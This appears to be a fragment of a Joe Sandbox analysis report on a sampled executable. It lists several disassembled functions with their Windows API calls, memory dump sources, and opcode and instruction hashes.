                                                                                                                                                                              • Instruction ID: 23918a4c35ebe6d1b2a2f341bd5f4da05ae20368e8c60a6df1bec1883508dafd
                                                                                                                                                                              • Opcode Fuzzy Hash: ca867abc706742a5993faa2ec1635044ec85fac8179d1345710c987e132239f3
                                                                                                                                                                              • Instruction Fuzzy Hash: D7D05B3138475833D21636967D17FCA7A9C9F55B96F00001BFF08A66D28ADA94C051FD
                                                                                                                                                                              Function 0052BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0052BAB8
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0052BCAB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                              • String ID: WIN_XPe
                                                                                                                                                                              • API String ID: 510247158-3257408948
                                                                                                                                                                              • Opcode ID: f5af84b3169ef6546a768410b700080ade9c73e340eaaf785f6190e755d76482
                                                                                                                                                                              • Instruction ID: 2a4a67332ae16ce9bb9d5203dd33d3b81d513db322c32a41af014d419a45e40d
                                                                                                                                                                              • Opcode Fuzzy Hash: f5af84b3169ef6546a768410b700080ade9c73e340eaaf785f6190e755d76482
                                                                                                                                                                              • Instruction Fuzzy Hash: 8CE0C970C0411DEFDB15DBA9E84AAEDBBB8BF69300F148886E026B2190C7715A45EF25
                                                                                                                                                                              Function 005184C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005184DF
                                                                                                                                                                              • PostMessageW.USER32(00000000), ref: 005184E6
                                                                                                                                                                                • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                              • Opcode ID: 01a526d8108c01f07eeee1d191c7a056ea447f7cbd75e0f67f78d6c258c066bf
                                                                                                                                                                              • Instruction ID: 1d9a92c5a4d55f6999763b2be84c9fdcdf2ab7d8792a51de7c44ddb7937d75ef
                                                                                                                                                                              • Opcode Fuzzy Hash: 01a526d8108c01f07eeee1d191c7a056ea447f7cbd75e0f67f78d6c258c066bf
                                                                                                                                                                              • Instruction Fuzzy Hash: A1D0C9723843147BE765A770EC4BFD66A64AB28B11F0409297759AA2D0C9E4B8148664
                                                                                                                                                                              Function 00518495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0051849F
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005184B2
                                                                                                                                                                                • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                                                              • Opcode ID: 28de0a37c521e3aff6985ea5303f51353dce190a87b56e5cbcab5f03677432e2
                                                                                                                                                                              • Instruction ID: 13a314063739cfa08ca9dd9a7a77b57296db9b7eca4696f3a4a475b279d6250f
                                                                                                                                                                              • Opcode Fuzzy Hash: 28de0a37c521e3aff6985ea5303f51353dce190a87b56e5cbcab5f03677432e2
                                                                                                                                                                              • Instruction Fuzzy Hash: 36D0C976384314B7E764A770EC4BFD66A64AB24B11F0409297759AA2D0C9E4A8148664
                                                                                                                                                                              Function 004FD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004FD01E
                                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004FD035
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                                                                              • String ID: aut
                                                                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                                                                              • Opcode ID: 628458f46d8ffa843fd80e5e8ed18478cafafd66dc31bb6f704eb436f0213961
                                                                                                                                                                              • Instruction ID: a5937b0d2cf980286190af3cd2a976813c0ae094a7dcfbf645b3c2d608af986c
                                                                                                                                                                              • Opcode Fuzzy Hash: 628458f46d8ffa843fd80e5e8ed18478cafafd66dc31bb6f704eb436f0213961
                                                                                                                                                                              • Instruction Fuzzy Hash: 2ED05EB554030EBBDB10ABA0ED0EF9A7B7CA710704F1041907A14D10D1D2B0D6598BA0